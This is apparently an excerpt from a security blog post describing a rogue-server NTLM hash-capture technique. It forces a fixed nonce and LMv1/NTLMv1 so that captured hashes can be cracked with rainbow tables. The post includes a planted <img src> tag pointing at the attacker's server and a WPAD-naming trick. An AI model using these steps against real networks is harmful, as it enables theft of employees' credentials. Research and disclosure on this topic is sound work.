The attacks here don't provide the raw hash unfortunately. But by acting as a rogue server we can send a pre-defined nonce that Rainbow Tables have already been generated. (or at least the first half of the LanMan hash). When you don't have a lot to begin with, collecting nearly the entire corporate's hashes for cracking is an amazing start.
Some documents that describe the NTLM Type Message formats:
Microsoft's support for transparent auth in HTTP is done by sending HTTP/401 Error pages with WWW-Authenticate: NTLM headers. Version 1.0 provides a pre-defined nonce and forces LMv1/NTLMv1 authentication only. This provides capture and crack of LM and NTLM hashes.
Follow this scenario for a second -- you have access to an internal corporate page, a classifieds site, the corporate e-mail is Outlook, you get the picture. Using some prior information such as the Windows domain name (easy to find) you run pokehashball-http and send/place an <img src="http://rogueservername/a.gif"> link. As long as IE believes you're on the Intranet (see KB Article 258063 for info) it will SILENTLY negotiate and transmit the user's authentication. Victory!
Other methods? How about naming your machine "WPAD"? :)
QuickTime vid of PokeHashBall-HTTP in action